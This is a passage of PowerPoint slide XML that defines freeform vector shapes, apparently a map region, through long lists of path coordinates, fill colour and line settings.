                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="163"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36369" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3698" y="2285"/>
                <a:ext cx="227" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 227"/>
                  <a:gd name="T1" fmla="*/ 148 h 172"/>
                  <a:gd name="T2" fmla="*/ 20 w 227"/>
                  <a:gd name="T3" fmla="*/ 137 h 172"/>
                  <a:gd name="T4" fmla="*/ 7 w 227"/>
                  <a:gd name="T5" fmla="*/ 133 h 172"/>
                  <a:gd name="T6" fmla="*/ 3 w 227"/>
                  <a:gd name="T7" fmla="*/ 114 h 172"/>
                  <a:gd name="T8" fmla="*/ 7 w 227"/>
                  <a:gd name="T9" fmla="*/ 95 h 172"/>
                  <a:gd name="T10" fmla="*/ 0 w 227"/>
                  <a:gd name="T11" fmla="*/ 91 h 172"/>
                  <a:gd name="T12" fmla="*/ 4 w 227"/>
                  <a:gd name="T13" fmla="*/ 81 h 172"/>
                  <a:gd name="T14" fmla="*/ 11 w 227"/>
                  <a:gd name="T15" fmla="*/ 60 h 172"/>
                  <a:gd name="T16" fmla="*/ 14 w 227"/>
                  <a:gd name="T17" fmla="*/ 56 h 172"/>
                  <a:gd name="T18" fmla="*/ 32 w 227"/>
                  <a:gd name="T19" fmla="*/ 61 h 172"/>
                  <a:gd name="T20" fmla="*/ 42 w 227"/>
                  <a:gd name="T21" fmla="*/ 57 h 172"/>
                  <a:gd name="T22" fmla="*/ 47 w 227"/>
                  <a:gd name="T23" fmla="*/ 49 h 172"/>
                  <a:gd name="T24" fmla="*/ 65 w 227"/>
                  <a:gd name="T25" fmla="*/ 40 h 172"/>
                  <a:gd name="T26" fmla="*/ 78 w 227"/>
                  <a:gd name="T27" fmla="*/ 22 h 172"/>
                  <a:gd name="T28" fmla="*/ 88 w 227"/>
                  <a:gd name="T29" fmla="*/ 20 h 172"/>
                  <a:gd name="T30" fmla="*/ 104 w 227"/>
                  <a:gd name="T31" fmla="*/ 22 h 172"/>
                  <a:gd name="T32" fmla="*/ 117 w 227"/>
                  <a:gd name="T33" fmla="*/ 28 h 172"/>
                  <a:gd name="T34" fmla="*/ 119 w 227"/>
                  <a:gd name="T35" fmla="*/ 30 h 172"/>
                  <a:gd name="T36" fmla="*/ 131 w 227"/>
                  <a:gd name="T37" fmla="*/ 23 h 172"/>
                  <a:gd name="T38" fmla="*/ 141 w 227"/>
                  <a:gd name="T39" fmla="*/ 25 h 172"/>
                  <a:gd name="T40" fmla="*/ 144 w 227"/>
                  <a:gd name="T41" fmla="*/ 19 h 172"/>
                  <a:gd name="T42" fmla="*/ 151 w 227"/>
                  <a:gd name="T43" fmla="*/ 18 h 172"/>
                  <a:gd name="T44" fmla="*/ 157 w 227"/>
                  <a:gd name="T45" fmla="*/ 14 h 172"/>
                  <a:gd name="T46" fmla="*/ 160 w 227"/>
                  <a:gd name="T47" fmla="*/ 4 h 172"/>
                  <a:gd name="T48" fmla="*/ 166 w 227"/>
                  <a:gd name="T49" fmla="*/ 0 h 172"/>
                  <a:gd name="T50" fmla="*/ 170 w 227"/>
                  <a:gd name="T51" fmla="*/ 10 h 172"/>
                  <a:gd name="T52" fmla="*/ 174 w 227"/>
                  <a:gd name="T53" fmla="*/ 13 h 172"/>
                  <a:gd name="T54" fmla="*/ 174 w 227"/>
                  <a:gd name="T55" fmla="*/ 28 h 172"/>
                  <a:gd name="T56" fmla="*/ 178 w 227"/>
                  <a:gd name="T57" fmla="*/ 33 h 172"/>
                  <a:gd name="T58" fmla="*/ 190 w 227"/>
                  <a:gd name="T59" fmla="*/ 28 h 172"/>
                  <a:gd name="T60" fmla="*/ 205 w 227"/>
                  <a:gd name="T61" fmla="*/ 20 h 172"/>
                  <a:gd name="T62" fmla="*/ 206 w 227"/>
                  <a:gd name="T63" fmla="*/ 23 h 172"/>
                  <a:gd name="T64" fmla="*/ 219 w 227"/>
                  <a:gd name="T65" fmla="*/ 21 h 172"/>
                  <a:gd name="T66" fmla="*/ 226 w 227"/>
                  <a:gd name="T67" fmla="*/ 24 h 172"/>
                  <a:gd name="T68" fmla="*/ 223 w 227"/>
                  <a:gd name="T69" fmla="*/ 26 h 172"/>
                  <a:gd name="T70" fmla="*/ 220 w 227"/>
                  <a:gd name="T71" fmla="*/ 28 h 172"/>
                  <a:gd name="T72" fmla="*/ 212 w 227"/>
                  <a:gd name="T73" fmla="*/ 32 h 172"/>
                  <a:gd name="T74" fmla="*/ 189 w 227"/>
                  <a:gd name="T75" fmla="*/ 33 h 172"/>
                  <a:gd name="T76" fmla="*/ 180 w 227"/>
                  <a:gd name="T77" fmla="*/ 40 h 172"/>
                  <a:gd name="T78" fmla="*/ 173 w 227"/>
                  <a:gd name="T79" fmla="*/ 46 h 172"/>
                  <a:gd name="T80" fmla="*/ 176 w 227"/>
                  <a:gd name="T81" fmla="*/ 54 h 172"/>
                  <a:gd name="T82" fmla="*/ 178 w 227"/>
                  <a:gd name="T83" fmla="*/ 64 h 172"/>
                  <a:gd name="T84" fmla="*/ 169 w 227"/>
                  <a:gd name="T85" fmla="*/ 74 h 172"/>
                  <a:gd name="T86" fmla="*/ 170 w 227"/>
                  <a:gd name="T87" fmla="*/ 83 h 172"/>
                  <a:gd name="T88" fmla="*/ 159 w 227"/>
                  <a:gd name="T89" fmla="*/ 86 h 172"/>
                  <a:gd name="T90" fmla="*/ 152 w 227"/>
                  <a:gd name="T91" fmla="*/ 89 h 172"/>
                  <a:gd name="T92" fmla="*/ 156 w 227"/>
                  <a:gd name="T93" fmla="*/ 99 h 172"/>
                  <a:gd name="T94" fmla="*/ 149 w 227"/>
                  <a:gd name="T95" fmla="*/ 102 h 172"/>
                  <a:gd name="T96" fmla="*/ 142 w 227"/>
                  <a:gd name="T97" fmla="*/ 109 h 172"/>
                  <a:gd name="T98" fmla="*/ 139 w 227"/>
                  <a:gd name="T99" fmla="*/ 127 h 172"/>
                  <a:gd name="T100" fmla="*/ 128 w 227"/>
                  <a:gd name="T101" fmla="*/ 128 h 172"/>
                  <a:gd name="T102" fmla="*/ 117 w 227"/>
                  <a:gd name="T103" fmla="*/ 132 h 172"/>
                  <a:gd name="T104" fmla="*/ 110 w 227"/>
                  <a:gd name="T105" fmla="*/ 138 h 172"/>
                  <a:gd name="T106" fmla="*/ 99 w 227"/>
                  <a:gd name="T107" fmla="*/ 142 h 172"/>
                  <a:gd name="T108" fmla="*/ 93 w 227"/>
                  <a:gd name="T109" fmla="*/ 155 h 172"/>
                  <a:gd name="T110" fmla="*/ 90 w 227"/>
                  <a:gd name="T111" fmla="*/ 165 h 172"/>
                  <a:gd name="T112" fmla="*/ 67 w 227"/>
                  <a:gd name="T113" fmla="*/ 170 h 172"/>
                  <a:gd name="T114" fmla="*/ 48 w 227"/>
                  <a:gd name="T115" fmla="*/ 170 h 172"/>
                  <a:gd name="T116" fmla="*/ 31 w 227"/>
                  <a:gd name="T117" fmla="*/ 171 h 172"/>
                  <a:gd name="T118" fmla="*/ 12 w 227"/>
                  <a:gd name="T119" fmla="*/ 166 h 172"/>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227"/>
                  <a:gd name="T181" fmla="*/ 0 h 172"/>
                  <a:gd name="T182" fmla="*/ 227 w 227"/>
                  <a:gd name="T183" fmla="*/ 172 h 172"/>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227" h="172">
                    <a:moveTo>
                      <a:pt x="6" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="12" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="163"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
